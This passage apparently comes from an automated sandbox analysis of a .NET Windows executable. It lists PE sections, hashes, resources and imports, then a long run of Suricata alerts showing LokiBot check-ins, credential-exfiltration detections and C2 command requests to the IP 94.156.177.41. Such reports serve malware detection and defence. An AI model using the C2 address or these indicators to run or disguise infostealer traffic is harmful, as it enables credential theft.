add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x93710	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x94000	0x4dd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x96a00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x91764	0x91800	c8462729e87d10658fc3d76504f22c57	False	0.879688171176976	data	7.674643796191771	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x94000	0x4dd0	0x4e00	b9927b67cd3d9f514de3a149dd3af280	False	0.9459134615384616	data	7.795169991313931	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a000	0xc	0x200	05ec29c2630c84f3ec38e6f200905009	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x94130	0x46f9	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9932852661126094
RT_GROUP_ICON	0x9882c	0x14	data	1.05
RT_VERSION	0x98840	0x3a0	data	0.4191810344827586
RT_MANIFEST	0x98be0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-04T06:52:06.767642+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49737	94.156.177.41	80	TCP
2024-12-04T06:52:06.767642+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49737	94.156.177.41	80	TCP
2024-12-04T06:52:06.767642+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49737	94.156.177.41	80	TCP
2024-12-04T06:52:08.289516+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49737	94.156.177.41	80	TCP
2024-12-04T06:52:08.695716+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49738	94.156.177.41	80	TCP
2024-12-04T06:52:08.695716+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49738	94.156.177.41	80	TCP
2024-12-04T06:52:08.695716+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49738	94.156.177.41	80	TCP
2024-12-04T06:52:10.175294+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49738	94.156.177.41	80	TCP
2024-12-04T06:52:10.478754+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:10.478754+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:10.478754+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:11.901579+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:11.901579+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:12.021642+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49739	TCP
2024-12-04T06:52:12.295749+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:12.295749+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:12.295749+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:13.773578+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:13.773578+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:13.893779+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49740	TCP
2024-12-04T06:52:14.164338+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:14.164338+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:14.164338+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:15.532769+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:15.532769+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:15.652893+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49741	TCP
2024-12-04T06:52:15.938259+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:15.938259+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:15.938259+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:17.218226+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:17.218226+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:17.338561+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49743	TCP
2024-12-04T06:52:17.657827+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:17.657827+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:17.657827+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:19.025824+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:19.025824+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:19.145796+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49746	TCP
2024-12-04T06:52:19.405358+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:19.405358+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:19.405358+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:20.880675+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:20.880675+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:21.002459+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49750	TCP
2024-12-04T06:52:21.262165+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:21.262165+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:21.262165+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:22.683187+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:22.683187+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:22.805215+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49752	TCP
2024-12-04T06:52:23.073188+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:23.073188+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:23.073188+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:24.551833+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:24.551833+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:24.671843+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49754	TCP
2024-12-04T06:52:24.932098+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:24.932098+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:24.932098+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:26.403488+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:26.403488+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:26.523527+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49756	TCP
2024-12-04T06:52:26.793786+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:26.793786+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:26.793786+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:28.258701+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:28.258701+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:28.378825+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49757	TCP
2024-12-04T06:52:28.638241+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:28.638241+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:28.638241+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:30.177926+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:30.177926+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:30.298016+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49759	TCP
2024-12-04T06:52:30.565483+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:30.565483+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:30.565483+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:32.085852+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:32.085852+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:32.214744+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49761	TCP
2024-12-04T06:52:32.892280+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:32.892280+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:32.892280+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:34.340931+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:34.340931+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:34.460893+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49762	TCP
2024-12-04T06:52:34.734954+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:34.734954+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:34.734954+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:36.018358+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:36.018358+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:36.138567+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49764	TCP
2024-12-04T06:52:36.409350+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:36.409350+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:36.409350+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:37.879906+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:37.879906+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:38.013205+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49766	TCP
2024-12-04T06:52:38.347814+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:38.347814+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:38.347814+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:39.817896+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:39.817896+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:39.937959+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49767	TCP
2024-12-04T06:52:40.197879+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:40.197879+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:40.197879+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:41.707155+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:41.707155+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:41.827201+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49768	TCP
2024-12-04T06:52:42.088177+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:42.088177+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:42.088177+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:43.608002+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:43.608002+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:43.730471+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49769	TCP
2024-12-04T06:52:44.074154+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:44.074154+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:44.074154+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:45.535212+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:45.535212+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:45.655216+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49770	TCP
2024-12-04T06:52:45.927567+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:45.927567+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:45.927567+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:47.435569+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:47.435569+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:47.555548+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49771	TCP
2024-12-04T06:52:47.828393+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:47.828393+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:47.828393+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:49.349051+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:49.349051+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:49.469198+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49772	TCP
2024-12-04T06:52:49.779959+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:49.779959+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:49.779959+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:51.251091+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:51.251091+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:51.371174+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49773	TCP
2024-12-04T06:52:51.635755+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:51.635755+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:51.635755+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:52.949423+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:52.949423+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:53.071414+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49774	TCP
2024-12-04T06:52:53.344478+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:53.344478+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:53.344478+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:54.623292+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:54.623292+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:54.743376+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49775	TCP
2024-12-04T06:52:55.009703+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:55.009703+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:55.009703+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:56.524407+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:56.524407+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:56.644483+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49776	TCP
2024-12-04T06:52:56.900865+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:52:56.900865+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:52:56.900865+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:52:58.372095+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:52:58.372095+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:52:58.498303+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49778	TCP
2024-12-04T06:52:58.761872+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:52:58.761872+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:52:58.761872+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:53:00.231152+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:53:00.231152+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:53:00.351213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49780	TCP
2024-12-04T06:53:00.620039+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:00.620039+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:00.620039+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:02.093707+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:02.093707+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:02.213689+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49786	TCP
2024-12-04T06:53:02.477302+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:02.477302+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:02.477302+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:04.009007+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:04.009007+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:04.129571+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49792	TCP
2024-12-04T06:53:04.401220+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49793	94.156.177.41	80	TCP
2024-12-04T06:53:04.401220+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49793	94.156.177.41	80	TCP
2024-12-04T06:53:04.401220+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49793	94.156.177.41	80	TCP
